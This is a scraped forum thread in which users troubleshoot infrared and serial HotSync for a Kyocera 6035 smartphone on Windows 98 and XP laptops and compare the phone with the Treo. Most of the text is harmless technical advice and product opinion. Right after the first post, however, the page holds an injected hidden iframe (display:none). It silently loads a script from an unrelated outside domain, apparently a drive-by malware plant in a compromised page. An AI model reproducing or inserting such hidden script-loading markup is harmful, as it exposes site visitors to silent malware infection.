Laptop hotsyncing

I use a Toshiba Satellite Pro 4300 laptop (Windows 98 OS) at work and would like to bring my 6035 serial cradle home and sync my office machine via IR. I attempted an IR sync as outlined at Palm's website on the subject. The laptop has IR capability, and when I "enable" it is shows that it is active on "COM5". However, when I go to select this in the Hotsync manager, there is no "COM5" available. The drop down only displays selections up to "COM4".

Any suggestions?

Thanks in advance!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I don't think that matters. My Hotsync Manager only gives me the choice to select COM1. However, I'm not a techie, so maybe someone out there can give you a better answer. Just make sure you follow the instructions discussed in this post .

Hope it helps.

You can change the com port in the registery. I have done it on Dell Laptop and desktop, and it is pretty easy. Go to Toshibs website and look for tech data on how to do it. If not there, the dell site has info on changing the assigned com port.

I am not sure if this will work on Windows 98 but it worked for me on Windows 2000. I downloaded Updater for HotSync v3.1.1 from http://www.palm.com/support/download...hs_update.html . After I installed it, I now see "infrared" as an option when the Hotsync icon on windows tray is right clicked.

Also on your phone, be sure to select "IR to a PC/Handheld" instead of the default "Direct Serial" in HotSync application.

I'd read the 'comport.txt' file in the Palm folder.. I'd also go into the Device Manager under system and examine your COM port configuration. You may be able to just delete one of the lower (serial) ports, and have it reinstall on reboot, letting the plug &amp; pray reassign the port status, including your IR. Your BIOS has to be set to BIOS P&amp;P instead of OS P&amp;P if you want to apply changes you make in the BIOS...You might also examine the IR port setting to see if you can manually change it to a lower COM port, juggling the others, in which case you have to set the plug &amp; play settings to be BIOS-dependent-it's probably on a different screen.

In WinXP, you can manually assign com ports. Make sure you're not dealing with a 'virtual infrared port'-they're harder to allocate. If all else fails, try to disable the serial port in the hardware manager on the notebook and see if the notebook assigns the IR a lower COM # in Win 98. I find it easier to just stay with the Win98 P&amp;P OS settings in your BIOS unless you have no other choice. Hope that helps, good luck!

Bought mine from Verizon about a week and a half ago.
PDA is what I need, but find myself refusing to carry 2 objects, and well, for some reason the cell always won. Hey, it helps me out in a pinch more often than my PDA does. I'm always on the go. This is Exactly what I was looking for (waiting for). Including the added volume for the earpiece that I'd given up on finding in a cell phone (heck many modern phones for that matter). I have trouble hearing the person I'm talking to even with volume set to max on the cell phone. Not so with the Kyocera

The size I don't mind (heck it's easier to talk (especially "hands-free" traditional, that is without earpiece/microphone gadgets) on a larger phone anyway. And it's certainly smaller and more practical than juggling 2 devices.

I loved the 6035 UNTIL:
[b:e33d0722a3]1.[/b:e33d0722a3] I tried installing the software on my laptop. OK I needed to connect the Hotsync cradle to do so. OOPS - my Compaq laptop shipped with 2 USB ports. NO Serial Port!

Returned to Verizon, they said hmmm. Well we don't sell it, but what you need is a serial-USB connector - you should be able to get it a Fry's.
So I got the connector, equiped with a 3' cord (which I don't need). [b:e33d0722a3]$40[/b:e33d0722a3].
Well, while on the subject, A huge docking cradle with extra bay for charging a spare battery Plus connecting cables plus extra cord DeFies Portability!! [i:e33d0722a3]What I need is a USB-HotSync Cable[/i:e33d0722a3]. That's it! I got the car battery charger. Phone came bundled with wall battery charger... But even a travel sized combo unit would be fantastic.
-note I did find something on Sprint's site, but they said it was not compatible with winXP, drivers were not included, and it required purchase of another cord -I don't know what else I do and do not need If i make this purchase, nor where to purchase or obtain said extra items, ...so ... ??-

[b:e33d0722a3]2.[/b:e33d0722a3] Bulky equipment in hand, I again tried installing... Compaq is looking for COM3 port. Shouldn't it look at USB? There was a message to look at NOTEhelp (or some such file -don't remember name) on my C drive. But could not find any such file. Kyocera help did not (help). A hardware dummy, I ask- how would I change this??

[b:e33d0722a3]3.[/b:e33d0722a3] XP comaptibility?? I found a note on some website that the 6035 is not even winXP comaptible. It's the only reverence I've seen. No topics or discussions on it. Is there an expected due date?? I get tired of sitting on equipment that is not useable. I find that if I do not use it when I get it, I never use it. It's a waste of money, expectations, and time. All too often the promise either does not arrive at all, or the time line is way over due. Hey, I've been waiting 2.5 years for Verizon to merge their databases (). Forget about backing up my database (kidding!) I need to purchase and install additional palm software. How can I do this without connecting to XP?

4. Accessories are shockingly limited. Not supported by Palm or "any" 3rd party companies. It seems that [i:e33d0722a3]something[/i:e33d0722a3] should be compatible -ie at least the PDA keyboards. But no. Nor any cases. Two are currently available online. Must wait for more options. Screen protectors are available (at www.freescreenprotectors.com), but try to find them in the stores. Any investment you've currently made in phone or PDA accessories (save Palm software) will not apply, and don't try shopping for anything locally. And though these phones are popular, don't know what the future product lines will be..

Comments on the Treo. At this point I'd get it in a heartbeat, except:
1.- Not CDMA compatible. I can change subscribers, but for best usage, it really needs to be tri-mode.
2. [b:e33d0722a3]Battery[/b:e33d0722a3] life is atrocious. Less than half of the 6035. Also, as it is built in, you cannot carry a spare battery to make up for the short life. And there is no replacing the battery when it's at the end of its life (read time to buy Another Communicator when battery gives).
3. Comparitively expensive.
4. I also hear that the speaker doesn't compare to Kyocera's.
On the upside, Treo is [b:e33d0722a3]XP[/b:e33d0722a3] comaptible, ships with [b:e33d0722a3]USB[/b:e33d0722a3] hotsync-charger _Cable_ (prefer to cradle anyway), and has product line
avaliable.

Any help or comments before I return this product (15-day grace period) are greatly appreciated. As I said before, up and running, this appears to be the (currently) perfect marriage.
